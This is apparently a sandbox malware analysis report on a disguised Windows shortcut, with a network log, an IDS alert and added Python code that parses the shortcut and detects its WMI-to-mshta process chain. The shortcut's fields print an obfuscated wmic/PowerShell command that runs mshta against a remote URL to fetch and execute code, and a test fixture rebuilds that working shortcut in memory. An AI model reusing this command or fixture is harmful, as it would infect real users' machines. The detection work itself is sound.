                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                          Category:dropped
                                          Size (bytes):758601
                                          Entropy (8bit):7.98639316555857
                                          Encrypted:false
                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                          MD5:3A49135134665364308390AC398006F1
                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                          Malicious:false
                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:PDF document, version 1.4, 6 pages
                                          Category:dropped
                                          Size (bytes):59085
                                          Entropy (8bit):7.650082635245118
                                          Encrypted:false
                                          SSDEEP:768:CFa0STkGez3ruTYFa7fcRRA4Ypom+4EytNt91YG/R1rIJoK7DtR3NMO2Wc1niwx:CF8T3ezda7S8ymVtLVX5Kb2pL
                                          MD5:FA61BD587E39B3E146951C9B476A7273
                                          SHA1:315CFFAAA2D889CFECDEE26AAF08725316620F4B
                                          SHA-256:D16978FF7CE6DD503E84C59F659C29E1E595A9ACAF8626EDACCE9C8E9A593ACA
                                          SHA-512:35F6A4A0EBBDC7B35EAC1FACE9153C406AE1D2282BF0135BC4AAF99002520AA94A2B25D21359A0421AE2C43255EFD9E425D93F582CBD8C81E99401FF303B040F
                                          Malicious:false
                                          Preview:%PDF-1.4.%.....11 0 obj.<<./ca 1./BM /Normal.>>.endobj.12 0 obj.<<./CA 1./ca 1./LC 0./LJ 0./LW 3./ML 4./SA true./BM /Normal.>>.endobj.14 0 obj.<<./Length 293./N 3./Filter /FlateDecode.>>.stream.x.}..J......(.....28.h..iRpi"..V..S..A.OHS..tspu+....c(....#....AR.x.......@.....?..F..[V[..G@`*...dK..$...O.K..o...@...6..`.O.,f'..O. .a.sx.0A..6..vf...8....{c7..%op..Z.:u.....Q.......0Q.F.....*....(.S....DGACAa..j.g.rx....]..s...PxM.......c...vhO.<..v....-X}...b3~...*....mDJH.T~...K..endstream.endobj.15 0 obj.<<./Type /XObject./Subtype /Image./Width 342./Height 117./ColorSpace [/ICCBased 14 0 R]./BitsPerComponent 8./Filter [/FlateDecode /DCTDecode]./DecodeParms [null <<./Quality 60.>>]./Length 3139.>>.stream.x...wP.....!.......J/.A..0.AZ. .#..4iB.......J....A.J.]$@.....@......v..7...y.g...=s.~..s..+}...8XX.X.9.X.899..Ex.....<.'.(.|BQFA^....U.}My..V....hs....G.S..3...& NNNn..$/................0`......a z+ .. (..... .0.........C....f...P.d.5l......E....f.Lb><*.Sr..u_..E.,K.:.F......8
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Veteran, Author: Chapman Faquir, Keywords: Installer, Comments: This installer database contains the logic and data required to install Veteran., Template: Intel;1033, Revision Number: {783BAB48-3720-490C-942D-60EE5BDFBDA3}, Create Time/Date: Mon Dec 30 11:27:28 2024, Last Saved Time/Date: Mon Dec 30 11:27:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
                                          Category:dropped
                                          Size (bytes):1478656
                                          Entropy (8bit):7.9821555527658825
                                          Encrypted:false
                                          SSDEEP:24576:QHbU+uhk5MJeNBpQWNUiOV8C8PEzpLxeEpcdZdQ2t0Z67oosDIzjMqPmLaeQb21/:ibU+uhhABSAOVgEzpLgrQM0cohDIk0mT
                                          MD5:667496F7272255EE2F22BAC54C9EE2CB
                                          SHA1:204D329851B6D9D60FEE19638EFB6A8AD214206F
                                          SHA-256:AB6A1626B35D91D7A96D227E993F9C71A6DCD7072E6930EE44237527858CFA70
                                          SHA-512:72492E5A7E1CE53F58C9313858F7F02C85FC05745B7F92BF2C217723A0520A34FF8B5F618C4C460F7503EF6ABE9DBABF484EF08EF24E9BDB0242241DC7446061
                                          Malicious:false
                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:JSON data
                                          Category:dropped
                                          Size (bytes):55
                                          Entropy (8bit):4.306461250274409
                                          Encrypted:false
                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                          Malicious:false
                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                          Process:C:\Windows\System32\wbem\WMIC.exe
                                          File Type:ASCII text, with CRLF, CR line terminators
                                          Category:dropped
                                          Size (bytes):160
                                          Entropy (8bit):5.083203110114614
                                          Encrypted:false
                                          SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MghQTV3OAFJQAive2:Yw7gJGWMXJXKSOdYiygKkXe/egGTRdeF
                                          MD5:2B5F43089A1954FE3CE86D0022775C11
                                          SHA1:891B79496B229CFFCBF4E3CDB350FD1C290A38C5
                                          SHA-256:B55B1791DD48A0E73BEC8B47BE6ADE6A5091E944EF1F898708AE72A752A28DB7
                                          SHA-512:E79E055FACA0224F2324ED73F6413B31B413E5C0D7080E786865F6DB9B72113C99B8E0D746528C61A1AC793CB2F142C7C86614EFD0844FA46DF3042F645F83A3
                                          Malicious:false
                                          Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 3560;...ReturnValue = 0;..};....
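The dropped text above is WMIC's own console output from the Win32_Process.Create call: ReturnValue 0 and a new ProcessId of 3560. The detail a responder should keep in mind is that a process started this way is parented by WmiPrvSE.exe, not by wmic.exe, so a parent/child rule that only looks for children of wmic.exe never fires. The block below is an added example, not part of the Joe Sandbox report: it pairs a wmic "process call create" event with the process WMI spawned for it by matching command lines across the WmiPrvSE.exe hop, then walks that subtree to mshta.exe. The process records are constructed to mirror this report's tree; 3560 is the ProcessId WMIC printed, while every other PID, the parent chain and the exact image paths are invented.

```python
"""Link a wmic 'process call create' event to the process WMI spawned for it
and walk that subtree to mshta. Added example, not part of the report. The
records below are constructed to mirror the report's process tree; 3560 is
the ProcessId WMIC printed, every other PID and the parent chain are made up."""
import re
from collections import defaultdict

CMD = "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
EVENTS = [  # constructed Sysmon Event ID 1 style records
    {"pid": 6120, "ppid": 6012, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": 'wmic.exe process call create "%s"' % CMD},
    {"pid": 2588, "ppid": 880, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r"C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding"},
    {"pid": 3560, "ppid": 2588, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": CMD},
    {"pid": 3720, "ppid": 3560, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": '"powershell" -Command ' + CMD.split("-Command ", 1)[1]},
    {"pid": 3808, "ppid": 3720, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'"C:\Windows\system32\mshta.exe" https://vividpulse.pro/Seed/Havoc'},
]

WMIC_CREATE = re.compile(r'process\s+call\s+create\s+"(.*)"\s*$', re.I)

def _norm(cmd):
    return re.sub(r"\s+", " ", cmd).strip().lower()

def find_wmi_spawned(events):
    """Pair each wmic 'process call create' with the process it caused. That process
    is parented by WmiPrvSE.exe, not wmic.exe, so match on the command line instead."""
    by_pid = {e["pid"]: e for e in events}
    pairs = []
    for w in events:
        m = WMIC_CREATE.search(w["cmd"]) if w["image"].lower().endswith("wmic.exe") else None
        if not m:
            continue
        for c in events:
            parent = by_pid.get(c["ppid"])
            if parent and parent["image"].lower().endswith("wmiprvse.exe") \
                    and _norm(c["cmd"]) == _norm(m.group(1)):
                pairs.append((w["pid"], c["pid"]))
    return pairs

def subtree(events, root_pid):
    """root_pid's record plus every descendant, depth-first."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    out, stack = [], [root_pid]
    while stack:
        pid = stack.pop()
        out.extend(e for e in events if e["pid"] == pid)
        stack.extend(c["pid"] for c in children[pid])
    return out

def detect_wmi_to_mshta(events):
    """Alert on a wmic-created process whose subtree runs mshta.exe with a remote URL."""
    hits = []
    for wmic_pid, spawned in find_wmi_spawned(events):
        for p in subtree(events, spawned):
            if p["image"].lower().endswith("mshta.exe"):
                m = re.search(r"https?://\S+", p["cmd"])
                hits.append({"wmic_pid": wmic_pid, "spawned_pid": spawned,
                             "mshta_pid": p["pid"], "url": m.group(0) if m else None})
    return hits

if __name__ == "__main__":
    for h in detect_wmi_to_mshta(EVENTS):
        print(h)
```

Matching on a normalised command line is deliberately loose (whitespace and case only); on real telemetry you would also bound the search by time and host, since two WMI-created processes with identical command lines are possible.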
                                          File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                          Entropy (8bit):2.641251841348939
                                          TrID:
                                          • Windows Shortcut (20020/1) 100.00%
                                          File name:GYede3Gwn0.lnk
                                          File size:1'922 bytes
                                          MD5:560d5d5e43b6d2ac1bdfb3ca4156e6d7
                                          SHA1:51ac4281c6bab97eed94a529d901cd29cc15f36d
                                          SHA256:98a28a0d4d028d446811b620e519d258feb8dc4c494705f372ae0c7c22fa9804
                                          SHA512:21ffe45bc4ac877c891aadba47babce7b1b71e4c4341ac9e41d735984957f724cf65864b8c41bc2dcd61ba4c20b4a5d78506b0a7e0e9f59d0341f7b46c92104e
                                          SSDEEP:24:8AyH/BUlgKN4ez+/3RkWNdk6Zoc+Nsqdd79dsrabqYnu7AQ:89uGeURldkUkzdJ9AaeIQ
                                          TLSH:6B415E146AE90B11F3B38E72547AB321957F7C8AEEB38F0C018196C91576610E875F5F
                                          File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                          Icon Hash:72d282828e8d8dd5

                                          General

                                          Relative Path:..\..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
                                          Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')"
                                          Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
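These three fields are the whole payload. The target is reached through a relative path to wmic.exe, the argument string uses WMI to start a hidden PowerShell that rebuilds the string "mshta.exe" from fragments so the literal never appears in the file, and the icon is borrowed from msedge.exe so the shortcut looks like a browser link. The block below is an added example, not part of the Joe Sandbox report: it parses the ShellLink header and StringData that these values come from, folds the single-quoted concatenation back together and flags each element of the chain. The .lnk bytes are a fixture constructed in memory from the three values above; the empty IDList, the ShowCommand value 7 (SW_SHOWMINNOACTIVE, chosen to match the report's "showminimized" window) and the zeroed FILETIMEs (which render as Dec 31 1600 in the report's file type line) are assumptions of the fixture, not bytes taken from the sample.

```python
"""Minimal MS-SHLLINK (.lnk) parser with triage heuristics for the
wmic -> powershell -> mshta chain in this report. Added example, not part
of the Joe Sandbox report; the .lnk bytes are constructed in memory from
the relative path, arguments and icon location in the "General" block."""
import re
import struct
from dataclasses import dataclass

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, HAS_NAME = 0x01, 0x02, 0x04
HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS = 0x08, 0x10, 0x20
HAS_ICON_LOCATION, IS_UNICODE = 0x40, 0x80
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
SW_SHOWMINNOACTIVE = 7  # ShowCommand that keeps the console out of sight (assumed for the fixture)

@dataclass
class ShellLink:
    link_flags: int
    show_command: int
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""

def _read_string(buf, off, unicode):
    """StringData item: u16 character count, then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252"), off + count

def parse_lnk(buf: bytes) -> ShellLink:
    header_size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if header_size != 0x4C or clsid != LINK_CLSID:
        raise ValueError("not a ShellLink header")
    (show_cmd,) = struct.unpack_from("<I", buf, 0x3C)
    off = header_size
    if flags & HAS_LINK_TARGET_ID_LIST:   # skip IDListSize + IDList
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize covers the whole structure
        off += struct.unpack_from("<I", buf, off)[0]
    link = ShellLink(link_flags=flags, show_command=show_cmd)
    for flag, attr in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                       (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                       (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:
            value, off = _read_string(buf, off, bool(flags & IS_UNICODE))
            setattr(link, attr, value)
    return link

def build_lnk(relative_path: str, arguments: str, icon_location: str) -> bytes:
    """Constructed fixture: 76-byte header, empty IDList, Unicode StringData."""
    flags = (HAS_LINK_TARGET_ID_LIST | HAS_RELATIVE_PATH | HAS_ARGUMENTS
             | HAS_ICON_LOCATION | IS_UNICODE)
    hdr = struct.pack("<I16sII", 0x4C, LINK_CLSID, flags, 0)   # size, CLSID, flags, attrs
    hdr += b"\x00" * 24                                        # three zero FILETIMEs
    hdr += struct.pack("<IIIH", 0, 11, SW_SHOWMINNOACTIVE, 0)  # FileSize, IconIndex, ShowCommand, HotKey
    hdr += b"\x00" * 10                                        # Reserved1/2/3
    assert len(hdr) == 0x4C
    id_list = struct.pack("<H", 2) + b"\x00\x00"               # IDListSize=2: TerminalID only
    enc = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return hdr + id_list + enc(relative_path) + enc(arguments) + enc(icon_location)

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

def fold_concat(cmd: str) -> str:
    """Collapse PowerShell single-quoted concatenation: 'ms' + 'hta' -> 'mshta'."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, _CONCAT.sub(lambda m: "'%s%s'" % (m.group(1), m.group(2)), cmd)
    return cmd

def triage(link: ShellLink) -> dict:
    args, folded = link.arguments, fold_concat(link.arguments)
    target, findings, url = link.relative_path.lower(), [], None
    if target.endswith("wmic.exe") and re.search(r"process\s+call\s+create", args, re.I):
        findings.append("wmic_process_call_create")  # child is parented by WmiPrvSE.exe
    if re.search(r"powershell(\.exe)?\s", args, re.I):
        findings.append("powershell_child")
    if re.search(r"-w(indowstyle)?\s*(1|h(idden)?)\b", args, re.I):
        findings.append("hidden_window")
    if folded != args:
        findings.append("string_concat_obfuscation")
    m = re.search(r"mshta(\.exe)?\s+(https?://\S+)", folded, re.I)
    if m:
        findings.append("mshta_remote_url")
        url = m.group(2).rstrip("'\")")
    if link.show_command == SW_SHOWMINNOACTIVE:
        findings.append("show_minimized")
    return {"target": target, "deobfuscated": folded, "url": url, "findings": findings}

# Fixture built from the values in the report's "General" block.
SAMPLE_LNK = build_lnk(
    r"..\..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe",
    "process call create \"powershell -w 1 powershell -Command "
    "('ms' + 'hta' + '.exe ' + 'https://vividpulse.pro/Seed/Havoc')\"",
    r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
)

if __name__ == "__main__":
    print(triage(parse_lnk(SAMPLE_LNK)))
```

The parser stops at StringData and ignores ExtraData, which is enough to recover the command line; the concatenation folder only handles single-quoted literals joined with "+", so double-quoted strings, -join, [char] casts and format operators would need their own rules.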
                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                          2024-12-31T10:38:08.665503+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49743 | 92.113.18.193 | 443 | TCP
                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Dec 31, 2024 10:38:02.084533930 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:02.084559917 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:02.084711075 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:02.099184036 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:02.099200010 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:02.779134035 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:02.779247046 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.145663977 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.145709038 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.146770000 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.146847010 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.149759054 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.195328951 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.336049080 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.336117983 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.430133104 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.430177927 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.430226088 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.430227995 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.430258036 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.430279016 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.430291891 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.430300951 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.430330992 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.431624889 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.431689978 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.431698084 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.431714058 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.431742907 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.431767941 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.523271084 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.523308992 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.523354053 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.523375034 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.523401022 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.523420095 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.525573015 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.525605917 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.525636911 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.525641918 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.525681973 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.526403904 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.526428938 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.526464939 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.526469946 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.526504993 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.528306961 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.528327942 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.528368950 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.528373957 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.528409958 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.528422117 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.617294073 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.617360115 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.617419004 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.617439985 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.617458105 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.617480993 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.618985891 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.619031906 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.619055033 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.619060040 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.619112968 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.619980097 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620023966 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620054007 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.620059967 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620104074 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.620520115 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620582104 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620589972 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.620594978 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.620630980 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.620650053 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.621418953 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.621464968 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.621480942 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.621485949 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.621521950 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.621551991 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.622160912 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.622203112 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.622222900 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.622246027 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.622260094 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.622294903 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.712249994 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.712299109 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.712337971 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.712348938 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.712372065 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.712395906 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
                                          Dec 31, 2024 10:38:03.731136084 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.731184959 CET | 443 | 49711 | 92.113.18.193 | 192.168.2.6
                                          Dec 31, 2024 10:38:03.731215954 CET | 49711 | 443 | 192.168.2.6 | 92.113.18.193
